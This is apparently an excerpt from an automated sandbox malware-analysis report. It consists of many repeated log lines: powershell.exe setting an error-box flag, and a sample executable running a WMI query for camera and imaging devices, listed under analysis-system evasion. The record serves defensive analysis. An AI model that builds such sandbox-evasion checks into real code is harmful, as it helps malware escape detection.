                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
